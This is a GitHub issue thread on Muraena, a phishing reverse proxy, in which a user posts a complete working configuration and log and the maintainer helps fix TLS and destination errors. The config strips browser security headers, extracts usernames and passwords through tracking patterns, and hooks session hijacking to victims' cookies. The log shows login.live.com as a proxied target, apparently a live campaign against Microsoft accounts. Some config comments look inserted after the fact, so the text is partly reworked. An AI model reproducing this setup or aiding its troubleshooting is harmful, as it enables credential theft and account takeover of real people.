muraenateam / muraena

Muraena is an almost-transparent reverse proxy aimed at automating phishing and post-phishing activities.
https://muraena.phishing.click/
BSD 3-Clause "New" or "Revised" License

Setup successful - but having issues with TLS #76

Closed elite-user closed 2 years ago

elite-user commented 2 years ago

This is my config file

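[proxy]
# Phishing domain: the origin the visitor's browser connects to.
phishing = "https://nyben.xyz"

# Target domain to proxy.
# Scheme and host ONLY, never a path. The value originally posted here,
# "https://knitsy.ddns.net/wp-admin", is the misconfiguration the
# maintainer pointed at; a landing path belongs in the lure URL, not here.
destination = "https://knitsy.ddns.net"

# Listening IP address (IPv4 or IPv6)
# e.g. 0.0.0.0 or [::]
IP = "207.148.4.123"

# Listen announces on the local network address.
# The network must be "tcp", "tcp4" or "tcp6".
listener = "tcp4"

# Listening TCP port
port = 443

# Simple port forwarding, used when the phishing site listens on a port
# different from the target domain, e.g.:
# - test.muraena:8443
# - victim.site:443
# Port mapping is configured as ListeningPort:TargetPort
#portmapping = "443:31337"

# Force HTTP to HTTPS redirection
[proxy.HTTPtoHTTPS]
enabled = true
HTTPport = 80

#
# Proxy's replacement rules
#
[transform]
# List of content types to exclude from the transformation process
skipContentType = [ "font/*", "image/*" ]

# Enable transformation rules in base64 strings
[transform.base64]
enabled = false
padding = [ "=", "." ]

# Request headers subject to the replacement rules
[transform.request]
headers = [
    "Cookie",
    "Referer",
    "Origin",
    "X-Forwarded-For",
]

# Response headers subject to the replacement rules
[transform.response]
headers = [
    "Location",
    "WWW-Authenticate",
    "Origin",
    "Set-Cookie",
    "Access-Control-Allow-Origin",
]

# Generic replacement rules:
# applied to the body and to any HTTP header enabled for manipulation above
content = [
    [ "this is blue", "this is green" ],
]

#
# Proxy's wiping rules
#
[remove]

# Request headers dropped before the request is forwarded
[remove.request]
headers = [
    "X-Forwarded-For",
    #"User-Agent"
]

# Response headers dropped before the response reaches the visitor.
# These are the browser-side protections (CSP, HSTS, framing and
# referrer policies); audit additions to this list rather than
# extending it blindly.
[remove.response]
headers = [
    "Content-Security-Policy",
    "Content-Security-Policy-Report-Only",
    "Strict-Transport-Security",
    "X-XSS-Protection",
    "X-Content-Type-Options",
    "X-Frame-Options",
    "Referrer-Policy",
    "X-Forwarded-For",
]

#
# Proxy's crafting rules
#
[craft]
[craft.add]
[craft.add.request]
# Headers to add to forwarded requests; `value` is left commented out here.
[[craft.add.request.headers]]
name = "User-Agent"
#value = "Ninja Agent"

[craft.add.response]
[[craft.add.response.headers]]

#
# Rudimental redirection rules
#
# NOTE(review): these still point at the sample's outlook.com targets
# while `destination` is a different site; adjust them to match.
[[drop]]
path = "/logout"
redirectTo = "https://outlook.com"

[[drop]]
path = "/signout"
redirectTo = "https://outlook.com"

#
# LOG
#
# The log records visitor IPs, user agents and request paths (see the
# excerpt in this issue); restrict its file permissions accordingly.
[log]
enabled = true
filePath = "muraena.log"

#
# DB (redis)
#
# Loopback only. An empty password is tolerable solely because the
# instance is bound to 127.0.0.1; do not expose it on the network.
[redis]
host = "127.0.0.1"
port = 6379
password = ""

#
# TLS
#
[tls]
enabled = true

# Expand replaces the certificate/key/root parameters with their content
# instead of a file path
expand = false
certificate = "./config/cert.pem"
key = "./config/privkey.pem"
root = "./config/fullchain.pem"

#
# Danger zone, be careful editing these settings
#
# Minimum supported TLS version: SSL3.0, TLS1.0, TLS1.1, TLS1.2, TLS1.3.
# Keep TLS1.2 or higher; the older protocols are deprecated.
minVersion = "TLS1.2"
preferServerCipherSuites = true
sessionTicketsDisabled = true

# InsecureSkipVerify controls whether muraena verifies the target
# server's certificate chain and host name. Leave it false: with true
# the proxy-to-target leg accepts any certificate, so you lose any
# assurance about which host you are relaying through. Note that the
# "x509: certificate signed by unknown authority" errors in this
# issue's log also occurred with destination login.live.com, which
# normally presents a publicly trusted certificate, so check that the
# host's CA bundle (e.g. the ca-certificates package) is installed
# before reaching for this switch.
insecureSkipVerify = false

# RenegotiationSupport
# Note: renegotiation is not defined in TLS 1.3.
# Options:
# - Never (default): disables renegotiation
# - Once:            allows a remote server to request renegotiation once per connection.
# - Freely:          allows a remote server to repeatedly request renegotiation.
renegotiationSupport = "Never"

#
# CRAWLER
#
[crawler]
enabled = false
depth = 3
upto = 20
externalOriginPrefix = "www-"
externalOrigins = [ "*.anotherdomain.site", "example.dev" ]

#
# NECROBROWSER
#
[necrobrowser]
enabled = false
endpoint = "http://necrobrowser.url/xyz"
profile = "./config/instrument.necro"

[necrobrowser.keepalive]
# GET on an authenticated endpoint to keep the session alive;
# every keepalive request is processed as its own necrotask
enabled = false
minutes = 5    # keeps the session alive every 5 minutes

[necrobrowser.trigger]
type = "cookies"
values = ["user_session", "dotcom_user"]  # values can be cookie names or relative paths
delay = 5   # check the victim's cookie jar every 5 seconds to see if we need to instrument something

#
# STATIC SERVER
#
[staticServer]
enabled = false
port = 8080
localPath = "./static/"
urlPath = "/evilpath/"

#
# WATCHDOG
#
[watchdog]
enabled = true

# Monitor rules file changes and reload
dynamic = true
rules = "./config/watchdog.rules"
geoDB = "./config/GeoLite2-City.mmdb"

#
# TRACKING
#
[tracking]
enabled = false

# Tracking types can be Path || Query (default)
#
# query:
#   ?identifier=trackingID
#
# path:
#   /trackingID
#
type = "query"

# Tracking identifier
identifier = "_gat"

# Rule to generate and validate a tracking identifier
regex = "[a-zA-Z0-9]{5}"

# Tracking initial HTTP header (empty is: If-Range)
header = "X-If-Range"

# Landing HTTP header (empty is: X-If-Landing-Redirect)
landing = "X-If-Landing-Redirect"

# Set a specific victim IP address
# ipSource = ""

# Set tracking cookie for a custom domain
# domain = ""

[tracking.urls]
credentials = [ "/session" ]
authSession = [ "/settings/profile" ]

[[tracking.patterns]]
label = "Username"
matching = "login"
start = "login="
end = "&password="

[[tracking.patterns]]
label = "Password"
matching = "password"
start = "password="
end = "&"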

But any time I run muraena with `./muraena -config config/config.toml`, I get this in my muraena.log:

```
24 Mar 22 00:48 UTC inf watchdog Watchdog rules reloaded successfully
24 Mar 22 00:48 UTC inf Muraena is alive on 207.148.4.123:443 [ https://nyben.xyz ] ==> [ https://knitsy.ddns.net/wp-admin ]
24 Mar 22 00:49 UTC inf [172.98.33.85:24685] - [GET][https://nyben.xyz(https://nyben.xyz)/]
24 Mar 22 00:49 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/
24 Mar 22 00:49 UTC inf [172.98.33.85:22355] - [GET][https://nyben.xyz(https://nyben.xyz)/favicon.ico]
24 Mar 22 00:49 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/favicon.ico
24 Mar 22 01:24 UTC inf watchdog Watchdog rules reloaded successfully
24 Mar 22 01:24 UTC inf Muraena is alive on 207.148.4.123:443 [ https://nyben.xyz ] ==> [ https://knitsy.ddns.net/wp-admin ]
24 Mar 22 01:24 UTC inf [45.132.115.182:31103] - [GET][https://nyben.xyz(https://nyben.xyz)/]
24 Mar 22 01:24 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/
24 Mar 22 01:24 UTC inf [45.132.115.182:8615] - [GET][https://nyben.xyz(https://nyben.xyz)/favicon.ico]
24 Mar 22 01:24 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/favicon.ico
24 Mar 22 01:25 UTC inf Redirecting HTTP to HTTPS: https://207.148.4.123/
24 Mar 22 01:25 UTC inf Redirecting HTTP to HTTPS: https://207.148.4.123/HNAP1/
24 Mar 22 01:29 UTC inf [45.132.115.182:4561] - [GET][https://207.148.4.123(https://207.148.4.123)/]
24 Mar 22 01:29 UTC err [errHandler] x509: cannot validate certificate for 207.148.4.123 because it doesn't contain any IP SANs in request GET 207.148.4.123/
24 Mar 22 01:29 UTC inf [45.132.115.182:4561] - [GET][https://207.148.4.123(https://207.148.4.123)/favicon.ico]
24 Mar 22 01:29 UTC err [errHandler] x509: cannot validate certificate for 207.148.4.123 because it doesn't contain any IP SANs in request GET 207.148.4.123/favicon.ico
24 Mar 22 08:19 UTC inf watchdog Watchdog rules reloaded successfully
24 Mar 22 08:19 UTC inf Muraena is alive on 207.148.4.123:443 [ https://nyben.xyz ] ==> [ https://login.live.com ]
24 Mar 22 08:25 UTC inf Redirecting HTTP to HTTPS: https://nyben.xyz/
24 Mar 22 08:25 UTC inf Redirecting HTTP to HTTPS: https://nyben.xyz/
24 Mar 22 08:25 UTC inf Redirecting HTTP to HTTPS: https://nyben.xyz/
24 Mar 22 08:25 UTC inf Redirecting HTTP to HTTPS: https://nyben.xyz/
24 Mar 22 08:34 UTC inf [45.132.115.229:24155] - [GET][https://nyben.xyz(https://nyben.xyz)/]
24 Mar 22 08:34 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/
24 Mar 22 08:34 UTC inf [45.132.115.229:12701] - [GET][https://nyben.xyz(https://nyben.xyz)/favicon.ico]
24 Mar 22 08:34 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/favicon.ico
24 Mar 22 08:37 UTC inf Redirecting HTTP to HTTPS: https://207.148.4.123/hudson
24 Mar 22 08:47 UTC inf [176.53.219.141:40153] - [GET][https://nyben.xyz(https://nyben.xyz)/]
24 Mar 22 08:47 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/
24 Mar 22 08:47 UTC inf [176.53.219.141:40153] - [GET][https://nyben.xyz(https://nyben.xyz)/favicon.ico]
24 Mar 22 08:47 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/favicon.ico
24 Mar 22 09:02 UTC inf Redirecting HTTP to HTTPS: https://nyben.xyz/
24 Mar 22 09:06 UTC inf Redirecting HTTP to HTTPS: https://nyben.xyz/
24 Mar 22 09:06 UTC err watchdog Blocked visitor [220.244.160.52/curl/7.79.1]
24 Mar 22 09:07 UTC inf Redirecting HTTP to HTTPS: https://nyben.xyz/
24 Mar 22 09:07 UTC inf [52.23.95.110:45416] - [GET][https://nyben.xyz(https://nyben.xyz)/]
24 Mar 22 09:07 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/
24 Mar 22 09:07 UTC inf Redirecting HTTP to HTTPS: https://nyben.xyz/
24 Mar 22 09:07 UTC inf [18.206.128.24:50590] - [GET][https://nyben.xyz(https://nyben.xyz)/]
24 Mar 22 09:07 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/
24 Mar 22 09:08 UTC inf Redirecting HTTP to HTTPS: https://nyben.xyz/
24 Mar 22 09:08 UTC inf [38.202.2.157:59371] - [GET][https://nyben.xyz(https://nyben.xyz)/]
24 Mar 22 09:08 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/
24 Mar 22 09:08 UTC inf [38.202.2.157:59371] - [GET][https://nyben.xyz(https://nyben.xyz)/favicon.ico]
24 Mar 22 09:08 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/favicon.ico
24 Mar 22 09:08 UTC inf Redirecting HTTP to HTTPS: https://nyben.xyz/
24 Mar 22 09:08 UTC inf [64.120.29.201:55717] - [GET][https://nyben.xyz(https://nyben.xyz)/]
24 Mar 22 09:08 UTC err [errHandler] x509: certificate signed by unknown authority in request GET nyben.xyz/
24 Mar 22 09:10 UTC inf Redirecting HTTP to HTTPS: https:///
24 Mar 22 09:20 UTC inf Redirecting HTTP to HTTPS: https://www.nyben.xyz/
24 Mar 22 09:38 UTC inf Redirecting HTTP to HTTPS: https://www.nyben.xyz/
```

ohpe commented 2 years ago

Try setting `insecureSkipVerify = true` in the `[tls]` section of the configuration file. Be aware this disables verification of the target server's certificate chain and host name (see the comment above that key in the config), so the proxy-to-target leg will accept any certificate; treat it as a diagnostic step, not a fix. Note also that the same `x509: certificate signed by unknown authority` error appears in your log with `login.live.com` as the destination, which suggests the host's CA trust store, rather than the target's certificate, may be what is missing.

elite-user commented 2 years ago

I did this and I'm still having the same issues, @ohpe.

ohpe commented 2 years ago

Check your configuration: the target is not configured correctly. `destination` must be the scheme and domain only, not a full URL — i.e. `destination = "https://knitsy.ddns.net"` rather than `"https://knitsy.ddns.net/wp-admin"`. Separately, the `x509: cannot validate certificate for 207.148.4.123 because it doesn't contain any IP SANs` entries come from clients (including scanners probing `/HNAP1/` and `/hudson`) reaching the server by its bare IP instead of the phishing hostname, so they are most likely unrelated to this problem.